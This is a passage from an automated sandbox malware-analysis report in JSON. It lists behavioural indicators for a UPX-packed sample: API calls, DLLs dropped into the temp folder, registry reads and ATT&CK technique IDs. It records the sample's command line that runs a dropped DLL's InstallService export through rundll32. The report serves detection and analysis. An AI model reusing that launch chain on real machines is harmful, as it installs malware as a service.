\"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter wwhko (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter wwhkf (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004528)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004936)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004936)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InstallServiceW (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InstallServiceA (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InstallService (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004920)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"CreateProcessA\" with parameter \"cmd /c %WINDIR%\\system32\\rundll32.exe %TEMP%\\x27x.dll,InstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" - (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"KERNEL32\" at base 775c0000\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"KERNEL32.DLL\" at base 775c0000\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ef0000\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"%TEMP%\\908501218X27.DLL\" at base 10000000\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75b00000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 775c0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b7e0000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75b00000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ef0000\n \"rundll32.exe\" loaded module \"KERNEL32.DLL\" at base 775c0000\n \"rundll32.exe\" loaded module \"%TEMP%\\X27X.DLL\" at base 10000000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74a30000\n \"rundll32.exe\" loaded module \"DWMAPI.DLL\" at base 74a10000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\908501218x27.dll (UID: 00000000-00004528)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004936)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004936)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004936)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004936)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004920)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\x27x.dll (UID: 00000000-00004920)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004920)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774A0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774A0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an executable section named \"UPX0\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an executable section named \"UPX1\"\n \"908501218x27.dll\" has an executable section named \".text\"\n \"x27x.dll\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an writable section named \"UPX0\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an writable section named \"UPX1\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an writable section named \".rsrc\"\n \"908501218x27.dll\" has an writable section named \".data\"\n \"x27x.dll\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"cmd /c %WINDIR%\\\\system32\\\\rundll32.exe %TEMP%\\\\x27x.dll,Install ...\" (UID: 00000000-00004936)\n Spawned process \"rundll32.exe\" with commandline \"%TEMP%\\\\x27x.dll,InstallService C:\\\\c14b685409ba77161297904148ff ...\" (UID: 00000000-00004920)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"cmd /c %WINDIR%\\\\system32\\\\rundll32.exe %TEMP%\\\\x27x.dll,Install ...\" (UID: 00000000-00004936)\n Spawned process \"rundll32.exe\" with commandline \"%TEMP%\\\\x27x.dll,InstallService C:\\\\c14b685409ba77161297904148ff ...\" (UID: 00000000-00004920)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"rundll32.exe\" (UID: 00000000-00004920) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" was detected as \"UPX\" and name: \"Packer\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"908501218x27.dll\" was detected as \"UPX\" and name: \"Packer\"\n \"908501218x27.dll\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"908501218x27.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"x27x.dll\" was detected as \"UPX\" and name: \"Packer\"\n \"x27x.dll\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"x27x.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: 908501218x27.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: x27x.dll)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"908501218x27.dll\"\n YARA signature matched on embedded PE in file \"x27x.dll\"\n YARA signature matched on embedded PE in file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-26", "type": 13, "relevance": 5, "name": "YARA signature match - PE executable embedded in .rsrc section", "description": "YARA signature for embedded PE executable in .rsrc section matched on file \"908501218x27.dll\"\n YARA signature for embedded PE executable in .rsrc section matched on file \"x27x.dll\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" was detected as \"Nullsoft PiMP Stub -> SFX\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"908501218x27.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\908501218x27.dll]- [targetUID: 00000000-00004528]\n \"x27x.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\x27x.dll]- [targetUID: 00000000-00004528]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\908501218x27.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\cmd.exe\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\908501218X27.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\X27X.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\CMD.EXE\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" reads file \"c:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n 